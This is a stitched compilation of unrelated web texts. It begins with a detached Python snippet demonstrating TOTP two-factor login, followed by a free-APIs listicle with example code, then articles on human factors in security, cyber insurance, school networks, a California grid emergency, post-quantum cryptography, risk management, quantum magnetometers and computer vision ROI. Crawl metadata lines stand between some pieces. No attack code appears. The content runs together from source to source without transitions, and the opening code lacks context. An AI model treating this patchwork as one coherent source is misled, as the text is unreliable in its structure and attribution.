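# third-party "pyotp" package; secrets and account names are placeholders.
import pyotp

# In practice each user's TOTP secret is generated at enrolment and stored
# server-side; pyotp.random_base32() creates one for this demonstration.
user_secret = pyotp.random_base32()
totp = pyotp.TOTP(user_secret)

print("Provisioning URI for an authenticator app:",
      totp.provisioning_uri(name="clinician@hospital.example", issuer_name="Example Hospital"))

def login(password_ok: bool, submitted_code: str) -> bool:
    """Both the password check and the current TOTP code must pass."""
    return password_ok and totp.verify(submitted_code)

# Simulate a login attempt using the code an authenticator app would show now.
current_code = totp.now()
print("Login with correct code:", login(True, current_code))
print("Login with wrong code:  ", login(True, "000000"))
```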
With free APIs, developers can practice programming by using those APIs to create applications. Once you have practiced writing apps, you can then move on to paying for some APIs that you can use to write even more useful or complex apps.
Phone Number Validator
There is a multitude of free APIs that are available to the public. So, your options for the types of APIs you can practice with are almost endless. One such API you can use to build applications is a phone number validator API, which enables you to ensure telephone numbers are valid for hundreds of countries around the world. With a phone number validator API, you can also find the company associated with a number and its location.
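As an illustration, the snippet below shows roughly what calling such a validation service looks like with Python's requests library. The endpoint URL, query parameters and response fields are hypothetical placeholders; each provider documents its own.

```python
# Hypothetical call to a phone-number validation API using the "requests"
# library. The endpoint, query parameters and response fields are
# placeholders; substitute those of whichever provider you sign up with.
import requests

API_KEY = "your-api-key-here"                        # placeholder credential
ENDPOINT = "https://api.example.com/v1/validate"     # placeholder endpoint

def validate_number(number: str) -> dict:
    response = requests.get(
        ENDPOINT,
        params={"number": number, "api_key": API_KEY},
        timeout=10,
    )
    response.raise_for_status()      # surface HTTP errors instead of bad data
    return response.json()           # e.g. {"valid": true, "country": "...", "carrier": "..."}

if __name__ == "__main__":
    result = validate_number("+14155550123")
    print(result)
```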
The big Git hosts, like GitHub, Gitlab, and Bitbucket, all provide their own APIs to enable developers to automate tasks like pulling and pushing code and merging code. Authentication is provided via OAuth, so you can be sure the APIs are secure and authentic.
With APIs like Let’s Validate, you can discover what technologies are being used on other websites. You can use validation APIs to reveal the technologies that are of interest. And because there is no authentication required, you can begin using the data straight away.
APIs like the Postman API enable you to make requests easily. You can write programs to script the testing of APIs. You can also send query strings and headers, and get response headers and bodies. If you are building an application, APIs used for testing are essential.
Website and RSS Aggregator
With this type of free API, you can aggregate data from a multitude of websites and RSS feeds and put them all in one place. Website and RSS aggregator APIs support CORS, which means you can access data straight from frontend apps. The aggregated information is returned in JSON format, so you are able to use the data immediately. You can use it to crawl websites, and RSS feeds to extract whatever data you want.
Various free public APIs enable you to create your own dictionary application. Popular ones like the Oxford Dictionary API and Merriam-Webster API are free as long as you limit your queries and sign up for an API key to access them. Dictionary APIs provide definitions of words and pronunciations. They often also include features like a word translator and thesaurus. You can also use sentence APIs to get example sentences that contain given words.
File Conversion APIs
File conversion APIs convert data between different formats, such as HTML, image files, and Office files. Other data formats you can convert include XML to JSON and CSV to JSON. You can also use file conversion APIs to merge multiple Office files into one document. Furthermore, you can use email validation APIs, barcode scanning APIs, OCR APIs, and natural language processing APIs for file conversions too.
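The simplest of these conversions can even be sketched with the standard library alone; for example, a CSV-to-JSON conversion looks like the snippet below (file names are placeholders), while dedicated conversion APIs handle the harder cases such as Office documents and images.

```python
# Minimal CSV-to-JSON conversion using only the standard library.
# File names are placeholders; dedicated conversion APIs handle the
# harder cases (Office documents, images, merging files).
import csv
import json

def csv_to_json(csv_path: str, json_path: str) -> None:
    with open(csv_path, newline="", encoding="utf-8") as f:
        rows = list(csv.DictReader(f))        # one dict per row, keyed by header
    with open(json_path, "w", encoding="utf-8") as f:
        json.dump(rows, f, indent=2)

if __name__ == "__main__":
    csv_to_json("records.csv", "records.json")
```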
Other Free APIs
In addition to those mentioned above, there is a plethora of other APIs that you can use to build applications. Some of the best free public APIs include:
· SYSTRAN Platform, which allows you to utilize and analyze both structured and unstructured content, such as social media and web content, in multiple languages.
· Open Weather Map, which enables you to receive weather data from any location on the planet.
· Investors Exchange Trading, which returns a wide range of effective spread, eligible volume, and price improvement of any stock, by each individual market.
I wrote previously about how people are the likely the most dangerous element of the cybersecurity ecosystem – how we, and our various limitations, often undermine cybersecurity policies, procedures, and technologies. I discussed how it is not just rogue actors who cause problems, but, rather, how human mistakes, whether oversharing information on social media, falling prey to social engineering attacks, or misconfiguring technology – are often the source of cyber-catastrophes.
Another area of human psychology that is important to recognize when it comes to information security, but which is often overlooked, is the impact of marketing, language, and biology.
Consider, for a moment, “smartphones.” “Smartphone” is, of course, a term that we all use – but it is, in reality, a misnomer that leads to security vulnerabilities.
The name “smartphones” emerged because these devices were originally marketed a decade ago by wireless phone companies that sold them as replacements for our then non-smart phones. When we bought smartphones, we typically retained our “calling plans” and “texting allowances” – both of which were contract terms that we associated with mobile phones. At the time that smartphones emerged, it would have been far more difficult for providers to convince us to abandon our older phones for “pocket computers that have a phone app” than to upgrade from a regular phone to a “smart phone.” And, so, despite voice calling being a tiny portion of smartphones’ capabilities and typical usage, the term “smartphone” was born and became a staple of language.
The perception of smartphones as phones, rather than as full blown computers, however, has led to people who would never run a computer without anti-virus software to do exactly that on their phones. Many people who would never allow someone else to access their computer files, or who have strong passwords to their laptops at work and at home, don’t bother password protecting their phones. Folks carried to their smartphones the practices that they previously used for their older phones; they did not apply those which they had long been using to protect their computers.
It is likely that our inability to easily perceive how the replacement for an item is something totally different than its predecessor, rather than the next version of it, results from our biology; we are programmed to expect the child of a cat to be a cat, of a dog to be a dog, etc.; it takes many human lifetimes for evolution to transform one species into another. In the technological world, however, change can happen rapidly – the replacement for a phone may be a computer that looks like a phone. To improve information security, we must better recognize the risks that such transformations bring.
This post was sponsored by Microsoft Office, which recently aired a Modern Workplace webcast entitled Cyber Security: The Human Element. To watch a replay please click here.
COVID-19 could boost need for cyber insurance
As the world grapples with the COVID-19 epidemic, cybercriminals are already taking advantage of the panic. Social engineering tactics are being used to target fear and disinformation, for example with spam emails about the virus that contain malware links.
Social media is a lucrative channel for cybercriminals and social media-enabled attacks generate $3.25 billion annually according to a study at the University of Surrey. Online fraud and shopping scams are also popular, with Australia's Cyber Security Centre receiving a report every ten minutes. According to the Reserve Bank of Australia, $574 million of online retail spent in 2018 was fraudulent, with CNP - "card not present" - being the most prevalent type of fraud.
Internet users with lower computer literacy, who are less aware of cyber-crime and more likely to fall for traps and scams, are also the least likely to know how to protect themselves. Seniors over 60, who didn't grow up with computers and social media, are the preferred victims of cybercrime against individuals. As a group they lost $649 million to cybercriminals in 2018 according to FBI data.
Even for more experienced users, protection is challenging. There's a bewildering amount of solutions out there. Which one is right for them? What about mobile devices? Should they protect their computer, or the home WiFi network, or both? How much should it cost? Who can be trusted for advice?
The reality is that most individuals don't have adequate protection or knowledge of how to get protection. And even for those that do, there are frequent data breaches beyond their control where their personal information is compromised. While governments around the world are tightening regulations around data, breaches still take place with alarming regularity.
In 2019 alone several billion records were compromised across organisations ranging from major social media platforms (Facebook: 540 million user details exposed) to banks (First American Financial Corp: 885 million transactions and customer records exposed). Even if someone has taken all the right steps, they can still become a victim.
This is why cyber insurance is becoming an increasingly important tool in the cyber defence arsenal. In the same way that no amount of locks and alarms can save a home from every burglary, businesses and individuals need to consider insuring themselves against digital theft.
Cyber-crime insurance also extends to damages beyond the internet. Lost and stolen credit cards, ID cards and passports also result in significant loss to individuals. Identity theft is a fast-growing crime: in 2017 nearly 60 million people were affected by identity theft in the US alone, with the yearly total cost of identity theft at $16 billion. Another $24 billion was lost to credit card fraud. It's not only adults who are affected: child identity theft cost families over $540 million in losses in 2017.
The challenge is that most consumers and businesses don't understand the concept or need for cyber insurance any more than they understand cyber-crime. As Daniel Carr, chief innovation officer and cyber lead at Occam Underwriting, noted at a recent forum, people "understand the harm of the cyber environment but they don't quite know who to blame yet, and that's systemic across every area of society, be that the judicial society, the regulatory environment or the commercial environment."
Service providers can play a key role here. Most telcos are well known and trusted brands that have an established relationship, often of several years duration, with users. In an increasingly competitive telco market, customer experience and offering added value is vital. Security products, including cybersecurity solutions and insurance, are a natural fit in the array of offerings from service providers. Cyber insurance aligns very well with telcos' Internet of Things propositions and their family propositions to have a personal cyber product.
The Internet of Things trend is only going to increase the number of vulnerabilities in homes and offices. Internet-connected smart devices increasingly contain personal data, such as account log-in details to third party services and payment information. Home surveillance systems are being hacked, and as other appliances get connected, they will create further exposure.
Schools across Southeast Asia have been forced to close during the pandemic lockdowns. In many cities, students have shifted to home-based learning with the aid of video conferencing technology. In Singapore, for example, new coronavirus clusters have emerged in schools recently, forcing these institutions to adopt a partial or full-closure and transition to online learning.
By now, many schools have adapted and are able to transition to remote or hybrid learning – where some students learn from home while others stay in school – at a moment's notice, when there is a surge in cases or when the authorities announce a city lockdown. The key, as school administrators have found, is to make that transition seamless.
Furthermore, educators realise that the future of learning is now inextricably linked to digital tools and online environments, even beyond the pandemic. Today’s students are more technologically savvy than ever, and digital devices make more frequent appearances in their lives both within and outside the classroom.
Governments across the region are also pushing for greater transformation in the education sector, which means that our institutions must align themselves accordingly to achieve this vision. However, blindly conforming to digital transformation may do more harm than good if schools are not smart about how they integrate their technologies.
Why must schools adopt a smart network?
Let’s first discuss the most immediate challenge facing schools right now — having to transition to home-based learning, often with very little notice. This is where a resilient network infrastructure is paramount in ensuring continuity of learning.
An intelligent campus network can respond nimbly to sudden changes in circumstances where network usage is expected to increase, such as during the shift to online learning. A smart network can efficiently manage these types of traffic spikes without the need for IT teams to manually configure anything, reducing network overload.
Additionally, with the integration of automated features, an intelligent network can effectively analyse, predict, and eliminate network downtime to prevent disruptions in the learning experience, which can be crippling in a fully remote environment.
The enabling of seamless collaboration and communication in a digital learning environment is another benefit of the intelligent campus network. It helps to provide students with the same access and tools to education at home as are available on campus. Students and teachers can effortlessly communicate in real-time with one another online via a communications platform that is supported by a smart network. Video conferencing, instant file transfers, and screen sharing can be accomplished without breaking a sweat to further preserve the learning experience.
Buckling down for the long run
The education sector, as a whole, is becoming cognizant of the long-term value of digitalisation and technology adoption. Singapore, for instance, has introduced an EdTech Plan. A country-wide plan that spans 2020 to 2030 designed to guide the development of the technological ecosystem and key platforms for learning across learning institutions from primary schools to pre-universities. The plan seeks to empower schools to leverage educational technology to help make education more connected, personalised, self-directed, and human-centric.
However, as schools begin to revamp existing curriculums and accommodate the use of technology and tap into the potential of digital transformation, they must also be conscious of the security risks involved.
In a world that is becoming increasingly connected, increased connectivity can drastically widen the cyberattack surface and add to the threat vectors cybercriminals can exploit. This is especially true in remote learning, where students connect to the school network, often using their personal devices and home networks. According to a recent 2020 Global Threat Intelligence Report by NTT, 29% of cyberattacks in Singapore were targeted at the education sector throughout 2019, making it the second most targeted sector globally after the government.
As such, schools must first address how they can build a secure foundation on which to lay out their digital transformation initiatives. This is where an intelligent network can play a crucial role. With strengthened encryption and enhanced security measures, an intelligent network can provide a common security strategy for all network access, minimising the risks of malicious cyberattacks.
The fortified security of a smart network can help protect schools’ critical data assets and the privacy of its students and staff while preserving the reputation of academic institutions.
A smart network also contributes significantly to improving the robustness of existing network infrastructure and offering higher bandwidth and connectivity to meet the requirements of new-age technology such as AI and IoT. Such emerging technologies provide a multitude of benefits, ranging from optimising the learning process to allowing easier access to educational materials.
Furthermore, a fully integrated smart network allows school IT teams to adopt a truly unified approach that allows all technology and communications systems to work together as a single, reliable network — even as more technology is added to the mix.
Educational institutions that have implemented a smart network are starting to see such systems bear fruit. The Singapore University of Technology and Design (SUTD) pivoted to an intelligent campus network to create an intelligent campus with education solutions that empower personalised learning with secure, reliable communications and collaboration. SUTD is now able to reduce costs, eliminate downtime, and optimise network efficiency to obtain its key goals of providing quality, secure, and individualised education for its students.
At its core, an intelligent network is a crucial first step for educational institutions, serving as the bedrock that supports futureproof teaching and research initiatives. It lays the foundation for creating an ideal academic environment for students, teachers, and faculty members — inculcating a responsive system that enables learning anywhere, anytime.
By Dirk Dumortier, Head of Business Development Smart-City, Healthcare, Education, Asia Pacific, Alcatel-Lucent Enterprise | <urn:uuid:fb90bd90-f652-48cc-a356-8d65ca487ea0> | CC-MAIN-2022-40 | https://disruptive.asia/are-school-networks-in-se-asia-smart-enough-to-empower-future-learning/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337889.44/warc/CC-MAIN-20221006222634-20221007012634-00718.warc.gz | en | 0.947405 | 1,152 | 2.75 | 3 |
California officials have declared a statewide grid emergency amid a lengthening heat wave and fears of power shortages.
Grid operator Caiso (California Independent System Operator) forecasts potential electricity shortages of three gigawatts from September 4 through to September 6, every evening.
Temperatures in Northern California are expected to be 10-20 degrees Fahrenheit warmer than normal through Tuesday, September 6. In Southern California, temperatures are expected to be 10-18 degrees warmer than normal.
Caiso has called on Californians to take voluntary conservation steps, such as setting thermostats to 78 degrees or higher, avoiding the use of major appliances and turning off unnecessary lights.
Electric car users should also avoid charging their vehicles during the Flex Alert period.
“It’s pretty clear Mother Nature has outrun us,” Governor Gavin Newsom said during a news conference. “The reality is we’re living in an age of extremes - extreme heat, extreme drought.”
The worst drought in 1,200 years has impacted the state's hydroelectric dams, which power 10 percent of California's needs.
The emergency order temporarily relaxes environmental regulations on gas-burning power plants, and allows companies to use backup generators more freely. Ships can also use their own generators while docked at ports.
More in Critical Power
Conference Session Roundtable: The latest in power innovation | <urn:uuid:054eeeec-3ae2-47a1-82c4-57c9859936f3> | CC-MAIN-2022-40 | https://www.datacenterdynamics.com/en/news/california-declares-statewide-grid-emergency-warns-of-blackouts/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337889.44/warc/CC-MAIN-20221006222634-20221007012634-00718.warc.gz | en | 0.917312 | 288 | 2.640625 | 3 |
Since Peter Shor published his eponymous algorithm for factoring composite numbers in 1994, cryptographic experts have speculated over whether and when the quantum computer needed to execute his algorithm on numbers of the size used in present-day public-key cryptosystems would become a reality. If and when it happens, the implications for much of the information security business will be profound. Expert opinions cover the full range, from: “It’ll never happen” to: “You-know-who already has one”. An unscientific survey places the median estimate in the late 2020s. So, we would appear to have ten years to monitor and react. Now, we are in a race: developing and evaluating new cryptographic algorithms takes deep expertise over an extended period of time. And substituting new algorithms for the ones that have become deeply embedded in information systems over the last thirty years takes an almost inexplicable amount of time. And don’t forget that, by recording key-exchange messages, a future quantum computer will be able to decipher plain text that existed any time in the then-past.
Harder to assess is the amount of time it will take to overcome the substantial engineering challenges remaining before a large-scale quantum computer can be put to work on the problem. Earlier this year, a team from the University of Sussex announced the first blueprint for a large-scale quantum computer, inviting other researchers to collaborate on the remaining practical problems. Without further advances, their machine would occupy the area of a football field and consume megawatts of power. So, we should not expect such machines to be commonplace in the near future. But, given time, further advances are inevitable.
As Yogi Berra astutely reminded us: “It’s tough to make predictions …” But, what is a prudent course of action today? At the very least, we need to follow developments and understand how we must react as researchers get closer to their goal.
Entrust Datacard researchers explore the state of the science and its implications for public-key cryptography in this new white-paper: https://www.entrust.com/resources/certificate-solutions/learn/post-quantum-cryptography | <urn:uuid:547691a3-e930-4341-a23f-4c76c1f929fe> | CC-MAIN-2022-40 | https://www.entrust.com/es/blog/2017/05/its-tough-to-make-predictions/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337889.44/warc/CC-MAIN-20221006222634-20221007012634-00718.warc.gz | en | 0.943402 | 458 | 3.125 | 3 |
Nowadays, more than before, each company needs an internal & daily Cyber Security assessment. To do that they need to provide an huge investment and this is a new concern due to the continuous evolution of Cyber Attacks. Risks faces all project aspects: budget, planning, goals, quality levels, and more. In fact, one of the most problematic elements of cyber security is the quick and constant evolution nature of security risks & attacks. Within this environment, the traditional approach is not the solution! Companies needs a Risk Management Platform that could helps to plan, implement, improve and continuously measure their security controls. A Risk Management Platform helps to increases the likelihood of positive events.
Risk Management Definition
The RISK MANAGEMENT is the ensemble of algorithms & processes, that use a stable scientific approach, for the identification, analysis, assessment, control, and avoidance, minimization and/or elimination of unacceptable digital-related risk across the entire organization. It enables the Chief Risk Manager (CRM) to have under control his network 24/7 using an aggregative data indicators of security risk.
Some RISK MANAGEMENT platform can provides you with recommendations on specific operational defensive actions while helping determine which resources should be allocated to match risk tolerance and business strategy.
As is the definition, Cyber Security is the ensemble of technologies, processes and practices designed to protect networks, computers, programs and data from attack, damage or unauthorized access. Cyber security involves protecting information and systems from major cyber threats, such as cyber terrorism, cyber warfare, and cyber espionage. In their most disruptive form, cyber threats take aim at secret, political, military, or infrastructural assets of a nation, or its people. Therefore it is a critical part of any governments’ and enterprises security strategy. Consequently, the hardware physical security is strongly related!
Ensuring cybersecurity requires coordinated efforts throughout an information system. Elements of cybersecurity include:
- Network security
- Application security
- Endpoint security
- Data security
- Identity management
- Database and infrastructure security
- Cloud security
- Mobile security
- Disaster recovery/business continuity planning
- End-user education
Cyber Security Assessment & Risk Management
A secure network architecture should follow a defense-in-depth philosophy and be designed with multiple layers of preventive controls. While preventive controls are ideal, detective controls are a must. There is no way to prevent any attack and sometimes preventive controls fail! Detecting intrusions into a network is not accomplished by deploying a single piece of technology.
To be confident about your network, you need to start with a Security Assessment, fix any revealed risk and continuously monitor it to reveal any further one (Risk Management)
Establishing a well-defined breach and attack simulations exercise program allows organizations the ability to identify malicious or anomalous traffic on the network and determine how the analyst should respond to this kind of traffic. When performing this kind of test, it is important to create traffic which mimics current attack methods.
At arimas we are proud to have different solutions to help companies in their Security Assessment as well as increase their defence to cyber attacks. | <urn:uuid:c0abdc03-638e-4159-bb2b-379aedfc9f2d> | CC-MAIN-2022-40 | https://arimas.com/2020/07/13/risk-management-platform-provides-recommendations-on-specific-issue/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00118.warc.gz | en | 0.924506 | 641 | 2.8125 | 3 |
If a quantum technology cannot make our human lives healthier, wealthier, and more enjoyable, then what’s its value? These human-realm, quantum technology use cases: Brains, Civilization, and GPS-Free Travel, probe magnetic fields with greater sensitivities and ease-of-use than before.
The range of the magnetic B-field that we are probing today is 1pT — 1fT. See Fig. 1. The Earth’s magnetic field amplitude (10-4 T) is ~1000 times larger than environmental noise (10-7—10-9 T), and ~100 million times larger than the magnetic fields generated at the scalp by neural currents in magneto-encephalography (MEG)
Figure 1. From High Sensitivity Magnetic Field Sensor Technology slide 11, of David Pappas (NIST)’s tutorial at the APS 2008 March Meeting of the American Physical Society meeting.
Bennett et al’s, 2021 Review: Precision Magnetometers for Aerospace Applications in the annotated Fig. 2 shows our area-of-interest. In the red rectangle, we see that sensors are moving to: smaller sizes, more precise resolution, and smaller power requirements. Of particular interest for our use cases, are these four:
- NV = nitrogen vacancy in diamond (see IQT: Quantum Diamond Deficits and Assets);
- AVC = atomic vapor cell: A glass cell holding a 400K vapor of alkali atoms, upon laser illumination, will align its spins. If a magnetic field is present, a polarization or amplitude change in the retransmitted light appears (section 3.1 in Bennett et al’s, 2021);
- SERF = Spin Exchange Relaxation-Free: like AVC, but denser vapor at a higher temperature, which results in a higher sensitivity (section 3.1 in Bennett et al’s, 2021 Review); and
SQUID = superconducting quantum interference devices; robust mid-1960s technology
Figure 2. OM= optomechanical, NV = NV centers in diamond, Atomic Vapor Cell + SERF = trapped atom quantum technology, SQUID – SQUID (Superconducting Quantum Interference Device), from Bennett et al’s, 2021 Review: Precision Magnetometers for Aerospace Applications
Regarding OM = Optomechanical: This is a rich topic to be written separately in the future. If you are OM-curious, see section 3.2 in Bennett et al’s, 2021 Review, further details in Li et al., 2021 Cavity Optomechanical Sensing.
Magneto-encephalography (MEG) is a non-invasive, neurophysiological technique that measures the magnetic fields generated by neuronal activity of the brain. MEG is direct, with higher temporal resolution: ~ms, and higher spatial resolution: ~mm, than indirect measurements, such as fMRI, PET and SPECT.
The gold standard for MEGs is currently SQUID, but that standard began to shift in 2018 to atomic vapor cell quantum (AVC) technology; in particular, to optically-pumped magnetometers (OPMs), with Boto et al, 2018’s new MEG system. While SQUID sensors have femtotesla (fT) sensitivity, the SQUID sensors have some negatives: 1) cryogenic cooling requirements, 2) rigid, patient-head-movement inside of a ~500 kg unit, 3) inflexibility to varying head sizes. For pediatric patients, MEGs by SQUID sensors are especially unsuitable.
Boto et al, 2018’s MEG-OPM prototype system addressed these negatives with a ~1kg custom helmet, where 13 OPM sensors were mounted. Each sensor was a 3x3x3 mm3, 87Rb-vapor-filled and heated component at ~150C, with helmet body temperature. The helmet was a 3D-printed ‘scanner-cast’, designed for the patient’s head, using an anatomical MRI scan. The magnetic field was indicated by a photodiode-detectable drop in light transmission, after a 795 nm, circularly polarized laser beam, spin-polarized the cell’s Rb atoms.
Feys et al, May 2022 work: On-Scalp Optically Pumped Magnetometers versus Cryogenic Magnetoencephalography for Diagnostic Evaluation of Epilepsy in School-aged Children improves upon the above with 32 sensors, tested with pediatric patients, who have idiopathic or refractory focal epilepsy. The research goal was to detect interictal epileptic discharges (IEDs) and compare the MEG-OPM data with MEG-SQUID data. Feys et al, 2022’s work demonstrated that MEG-OPM provided similar sensitivity: 1-3pT/Hz1/2, but higher IED amplitude and higher signal-to-noise than conventional MEG-SQUIDs. Figure 3 indicates the experimental set up.
Figure 3 Experimental Setup for MEG IED measurement of OPM versus SQUID (4th figure) from Feys et al, 2022.
The MEG research field is active with new approaches implementing flexible OPM and SERF designs. A glimpse of what is ahead can be seen in the use cases of the Abstract book of the Today’s Noise Tomorrow’s Signal 2019 workshop.
The gold standard for archeological magnetic field mapping is also SQUID technology. A high-profile example, which discovered the historical extent of the capital: Karakorum of the Mongol Era, was published by Bemmann et al, 2021, last November, with a lead in Nature. The journal displayed an exotic-looking field photo, which included a wagon carrying a set of cryonically cooled SQUIDs that was pulled by an off-road vehicle. Why would Nature highlight a science result based on SQUID, which is mid-1960s technology? Intrigue won the day.
I suggest to archeological magnetic mappers to consider the benefits of the geophysics approach to use drones. With a keyword search: UAV magnetic field mapping, you will discover drone-mounted, magnetometers, based on atomic vapor cells that approximate the magnetic field flux sensitivity of SQUID sensors: on the order of several pT/Hz1/2. In addition, new operational modes for atomic vapor cells, such as light-shift-dispersed Mz, have been developed, that would further increase the magnetometer’s sensitivity.
Consider these advantages:
1) More efficient data collection and processing, 2) lower field cost, 3) access to inaccessible or high risk regions, 4) greater worker safety, 5) UAV integration with other geophysical sensors, and 6) no need for cryostats. A disadvantage compared to SQUID is the scalar, instead of vector, magnetic flux measurement. However, GPS inertial sensors and a high sampling rate can provide mapping capabilities. This 21-minute video from Geometrics, from which I grabbed a frame for Fig. 4, demonstrates such a system in the field.
Figure 4 A frame-grab from a Geometrics video, which demonstrates UAV magnetic-field mapping
Where is Dark Ice? We begin this section with a mystery. Lockheed Martin put significant resources into developing the NV in diamond magnetometer prototype, with a team (led by M.J. DiMario), an Element-6 partnership for diamond manufacture, 21 patents, Dark Ice tests and future plans, public press (which led to hundreds of international press pieces), Dark Ice trademark and a logo applications, a research preprint (Edmonds et al, 2020) and publication (Edmonds, et al, 2021).
Yet Lockheed Martin never followed up its logo application request, and the company never provided a trademark “statement of use” (SOU) to the USPTO. Therefore the logo and trademark were dropped (many thanks to D. Barnes to understand the legalities). The Dark Ice team leader left Lockheed Martin in 2020, to form his own company. Of the public research results, in Figure 1 of the preprint, the instrument is only called ‘Device’, and in the corresponding 2021 journal article, the photo of Dark Ice’s hardware is deleted altogether. Dark Ice appears to have gone ‘Dark’.
Figure 5 Lockheed Martin’s 2019 press release photo of the Dark Ice device
The prototype used a synthetic nitrogen-doped diamond to measure the magnetic field variations: strength and direction. When overlaid with maps of Earth’s magnetic field, supplied by the National Oceanic and Atmospheric Association, the prototype produced Earth location information. This technology would potentially support situations when GPS was not available or in otherwise challenging conditions. According to the Dark Ice team’s preprint and published papers, the diamond’s chemical vapor deposition (CVD) manufacturing process was successful to probe irradiation and annealing procedures to support the manufacture of quantum-tech quality NV diamonds.
Today, the development focus in the NV in diamond research field is to improve the manufacture of such diamonds and to improve readout fidelity technologies.
As described in the comprehensive Achard et al, 2020 Review: CVD diamond single crystals with NV centres, the main advantages of CVD for making quantum-grade diamonds is the ability to engineer stacked layers of different doping and composition in a dynamic and very flexible way that can scale. The Review presents the best processes dependent on application, including for magnetometry. The ∼10-15 ppm, quantum-tech regime, implemented by the Dark Ice team, requires adapted growth conditions that allow for high doping efficiency, while preserving the crystalline quality. The Edmonds et al, 2021 results further identified the limiting sensitivity factors for a magnetometer. Himadri Chatterjee’s 2021 PhD thesis used an Element-6/Dark Ice-process diamond with other diamond samples and demonstrated magnetic field detection sensitivities into the ~100 nT/Hz1/2 regime, using IR absorption magnetometry. He provided a list of improvements for the system’s sensitivity to reach the tens of pT/Hz1/2 sensitivity of other researchers. His thesis and the Achard et al Review are good sources to find descriptions of the community’s research efforts.
While Dark Ice’s disappearance might be concerning news about the technical viability of such magnetometers, don’t worry. This note should reassure you that NV in diamond magnetometer progress marches on.
Amara Graps, Ph.D. is an interdisciplinary physicist, planetary scientist, science communicator and educator and expert on all quantum technologies. | <urn:uuid:682d3779-cc25-4bb2-97de-fdd4868b1a18> | CC-MAIN-2022-40 | https://www.insidequantumtechnology.com/news-archive/quantum-magnetometers-navigating-human-realms/amp/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00118.warc.gz | en | 0.877498 | 2,239 | 2.8125 | 3 |
As business leaders investigate the transformative Return on Investment or ROI of computer vision, they are finding evidence that this technology can improve virtually every industry it touches. This explains the rapid growth of the computer vision market, which held an estimated value of $15.9 billion in 2021 and is expected to reach $51.3 billion by 2026.
It may explain why nearly all respondents in a recent IDG/Insight survey believe that computer vision will boost revenue while saving time and money—and this could also be why 37% of those respondents plan to implement the technology to improve their operations in the near future.
Whether the ROI goals of an organization relate to defect detection, operational efficiency, preventative maintenance, cost reduction, customer satisfaction, security, better healthcare outcomes, or safety—this white paper shows how computer vision is empowering firms across all industries to achieve never-before-possible outcomes.
This section describes what computer vision is, the basics of how it works, and the general benefits that enterprises receive when leveraging the technology.
In the simplest of terms, computer vision is a technology that allows computers to analyze, interpret, and understand visual information in order to automate tasks and make decisions that normally require humans. As IBM puts it, “If AI enables computers to think, computer vision enables them to see, observe, and understand.”
Of course, computers do not technically “see” the way humans do. Instead, they derive statistical inferences (or conclusions) from numerical values—values that represent the colors of pixels in a digital image.
Just like every person learns to see and understand the world, computer vision algorithms need to receive training to interpret and understand the visual information they capture. Computer vision platforms use deep learning technology to “train” algorithms capable of deriving inferences from visual data and making nuanced decisions based on those inferences.
The computer vision training process involves downloading thousands (or millions) of labeled or annotated images. For example, training images for a defect detection system would include annotations to indicate the presence/non-presence of defects and the types of defects involved. After receiving enough examples, the AI algorithm learns to identify these defects in real-time.
With the right training, an AI algorithm can perform a wide range of tasks that would have required visual monitoring, analysis, interpretation—even expert-level decision-making.
The best computer vision solutions function as full-lifecycle platforms that facilitate the fast and rapid training of new AI algorithms. A full-lifecycle computer vision platform includes tools to automate the process of annotating and tagging training images. Advanced platforms also feature tools to instantly generate synthetic training images, to increase the size of the datasets. This speeds up the process of developing computer vision models for unique and entirely novel scenarios.
Computer vision platforms may now feature no-code interfaces so non-tech savvy users can train sophisticated algorithms without knowing how to code.
A computer vision platform integrates with a network of high-definition cameras strategically positioned to capture visual information. This could be an existing network of cameras or a new one to suit the demands of the use case. Computer vision algorithms can even receive and interpret live video and images from mobile cameras, such as flying drones and walking robot dogs.
As for hosting, computer vision platforms can run in the cloud or on locally installed edge servers. Edge servers offer an increased level of security by hosting the data locally to the device. Developers can configure an edge-based computer vision system to integrate with existing IoT infrastructures and on-premises configurations.
The practical use cases for computer vision are endless, including systems for:
Ultimately, computer vision eliminates the errors, inefficiencies, and negative outcomes that inevitably happen when workers suffer from boredom or distractions in monotonous visual jobs. These negative outcomes include increased absenteeism, high turnover, errors, injuries, and counterproductive work behavior. (4) Computer vision also saves time and money through its capacity for 24/7 uptime and exponentially faster and more accurate visual task completion.
By freeing up employees to focus on more business-critical tasks, computer vision alleviates labor burdens—even when it comes to high-skilled analyst jobs. This brings the added benefit of decreasing the need for workers to be physically present during pandemic conditions.
Here is an overview of some of the most compelling ROIs of computer vision:
This section examines the return on investment for computer vision technology in specific industries. Since computer vision is a horizontal solution that services a wide variety of needs, there is significant overlap across the industries below, so it is worthwhile to read all of the sections.
Manufacturers are using computer vision to realize high ROIs in:
Manufacturing defects result in numerous costs related to the notification of customers/retailers, tracking down defective products, shipping costs, replacement costs, in addition to reputational damage, and product liability lawsuits. Human-led quality assurance activities are vital to preventing these costs, but the work is intensive, monotonous, expensive, and highly prone to errors. In other words, serious and potentially dangerous defects frequently go unnoticed due to unavoidable human error.
In contrast, computer vision automates real-time defect detection tasks to achieve orders of magnitude greater consistency, accuracy, and speed—at a cost that is exponentially more affordable than human labor alone. Computer vision can instantly detect scratches, cracks, dust, painting errors, dents, packaging errors, labeling errors, misplaced bottle caps, sanitary issues, and other defects that it is trained to identify.
Digital twins are virtual replicas of physical products and manufacturing processes—three-dimensionally digitized into the metaverse to help engineers understand, forecast, design, test, and optimize performance in real-time.
Computer vision assists in the creation of digital twins by using HD cameras and other sensors to capture the data required for rapid digital twin modeling and creation. Computer vision also allows digital twins to reflect real-time metrics, insights, and visuals on manufacturing activities as they happen.
Digital twin strategies with computer vision offer:
Manufacturers leveraging digital twin technology can achieve the following ROIs:
The severe injuries that arise from PPE non-compliance have been studied closely in the several industries. The statistics from NYU’s protective equipment standard illuminate the clear relationship between serious injuries and failure to use PPE. For example, only 1% of face injuries happen to people with facial protection. And, only 16% of workers who suffered head injuries were using hard hats (dispite 40% were required to wear them at the time of injury).
Strict enforcement of PPE rules is one of the most important ways to prevent these severe manufacturing injuries. Nevertheless, it is impossible for human managers to monitor PPE use for all workers across every inch of a facility at all times.
